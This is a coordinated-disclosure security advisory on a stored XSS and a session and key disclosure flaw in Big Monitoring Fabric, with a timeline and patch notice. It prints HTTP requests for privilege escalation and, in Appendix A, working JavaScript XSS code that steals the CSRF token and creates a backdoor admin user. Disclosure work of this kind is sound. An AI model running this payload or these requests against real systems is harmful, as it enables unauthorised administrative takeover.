ADVISORY SUMMARY

The following document describes identified vulnerabilities in the Big Monitoring Fabric application. Two high-risk vulnerabilities were found within the application. 

Impact

Successful exploitation of the cross-site scripting (XSS) vulnerability would grant an unauthenticated remote attacker administrative access to the Big Monitoring Fabric application and (due to the nature of the application) SSH console access to the affected system.

The sensitive information disclosure vulnerability could be exploited by a low privilege read-only user to escalate their privileges up to an administrative account. Exploitation would allow the attacker to have SSH console access to the affected system.

Risk Level

Two high-risk vulnerabilities.

Affected Vendor

Product Description

Big Monitoring Fabric is an enterprise network switch monitoring and management software solution. The project’s official website is https://www.bigswitch.com.

Vulnerabilities List:

Two vulnerabilities were identified within the Big Monitoring Fabric application:

• CROSS-SITE SCRIPTING (XSS)
  
• SENSITIVE INFORMATION DISCLOSURE

Solution

Update to the appropriate version, detailed in the table below:

Credits

• Chris Davis, Senior Security Analyst, Bishop Fox - cdavis@bishopfox.com
• Jake Yamaki, Senior Security Analyst, Bishop Fox - jyamaki@bishopfox.com
• Rob Antonucci, Security Associate, Bishop Fox - rantonucci@bishopfox.com
• Robert Brulles, Security Analyst, Bishop Fox

Timeline

1. Initial Discovery: 07/19/2019
2. Contact with vendor: 07/19/2019
3. Vendor acknowledges vulnerabilities: 07/19/2019
4. Vendor releases patched versions: 10/31/2019
5. Vulnerability disclosed: 12/27/2019

VULNERABILITIES

CROSS-SITE SCRIPTING (XSS)

The /login endpoint in the Big Monitoring Fabric application was vulnerable to stored XSS. An unauthenticated user could submit an invalid username containing a JavaScript XSS payload during the login process, as shown below:

Figure 1 - XSS payload in failed login attempt

The application logged the XSS payload within the invalid username to the /login_history endpoint. The application response contained the arbitrary JavaScript within the XSS payload, as shown below:

Figure 2 - XSS payload shown in /login_history page source code

The JavaScript payload then executed when an administrative user navigated to the affected /login_history endpoint. The payload loaded an external attacker-controlled JavaScript file that created a backdoor admin user (the code for which is included in Appendix A of this advisory). The payload was Base64-encoded and placed in an eval function. The backdoor XSS user was then created, as shown below:

Figure 3 - XSS created backdoor admin user

The team then authenticated to the Big Monitoring Fabric application with administrative permissions using the newly created XSS user. At this point, the team changed the Default admin password, allowing for SSH console access, as shown in the sensitive information disclosure of this advisory.

SENSITIVE INFORMATION DISCLOSURE

The Big Monitoring Fabric application was affected by one sensitive information disclosure vulnerability. The sensitive information disclosure revealed valid session data for administrative users and RSA private keys that allowed vertical and horizontal privilege escalation.

Session Data and RSA Private Keys

While authenticated as a user in read-only or admin groups, the API /api/v1/export endpoint returned SSH RSA private keys and valid user session cookies, including those for administrative users, as shown below:

Request to API export endpoint

POST /ws/request HTTP/1.1 …omitted for brevity… {"request"{"timeout":10,"method":"GET","path":"/api/v1/export","headers":{"Content-Type":"application/json"},"query":""}}

Response

The SSH private keys appeared to be legitimate, but the team was unable to use them to gain further access with the keys. The admin session cookie was valid and read-only users could use it to perform vertical privilege escalation. First, the following API request was sent to remove a low-privilege read-only user from the read-only group: 

PATCH /api/v1/data/controller/core/aaa/group[name="read-only"] …omitted for brevity… Cookie: session_cookie=WOIcPiyvBtXj8KZHhpbuIkyjRcOoVemM …omitted for brevity… {"user":[]}

Figure 4 - Request to remove low user from read-only group

The application responded with a 204 status code, which indicated that the user had successfully been removed from the low privilege group. Once the user was removed from the read-only  group, the following request was sent to add the user to the admin group:

PATCH /api/v1/data/controller/core/aaa/group[name="admin"] …omitted for brevity… Cookie: session_cookie=WOIcPiyvBtXj8KZHhpbuIkyjRcOoVemM …omitted for brevity… {"user":["admin","low"]}

Figure 5 - Request to add low user to admin group

The team then authenticated to the Big Monitoring Fabric application with the low user, which now had administrative privileges. Using the newly gained administrative permissions, the Default admin password was changed, as shown below:

Figure 6 - Default admin password reset

The password change did not require knowledge of the original password. The Default admin password change also affected the SSH console admin authentication, which allowed access the SSH console with the new credentials.

APPENDIX A - XSS Exploit Code

The following code was created and used for the XSS finding of this advisory:

// XSS payload to create a backdoor admin user
// Payload was base64 encoded and wrapped in JavaScript eval(atob("[Encoded Payload Here]"))
//Function to Create backdoor user
Backdoor = async () => {
var xhr = new XMLHttpRequest();
xhr.open("POST", "/ws/request", true);
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/json");
//Grab csrftoken from cookies and set to header
xhr.setRequestHeader("X-CSRFToken", document.cookie.match(new RegExp('(ˆ|)'+'csrftoken' + '=([ˆ;]+)'))[0].split('=')[1]);

xhr.send('{"request":{"timeout":10,"method":"POST","path":"/api/v1/data/controller/core/aaa/local-user[user-name=\\"XSS\\"]","headers":{"Content-Type":"application/json"},"body":"{\\"user-name\\":\\"XSS\\",\\"password\\":\\"method=PBKDF2WithHmacSHA512,salt=DKB4mzOZvfE5KSYm4eGVqq,rounds=25000,ph=true,60X6SfgOmeiTmHq0fc7h1wSpSYtgoyzOA2gIPe8VBSM8V5nZ4x)3grol_YN4pKKZPMJE3GGWdWLvihsk9be3kQ\\"}"}}')
getAdmin()
}
//Function to grant admin permissions
getAdmin = async () => {
var xhr = new XMLHttpRequest();
xhr.open("POST", "/ws/request", true);
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/json");
xhr.setRequestHeader("X-CSRFToken", document.cookie.match(new RegExp('(ˆ|)'+'csrftoken' + '=([ˆ;]+)'))[0].split('=')[1]);

xhr.send('{"request":{"timeout":10,"method":"PATCH","path":"/api/v1/data/controller/core/aaa/group[name=\\"admin\\"]","headers":{"Content-Type":"application/json"},"body":"{\\"user\\":[\\"admin\\",\\"XSS\\"]}"}}')
}
onload=backdoor();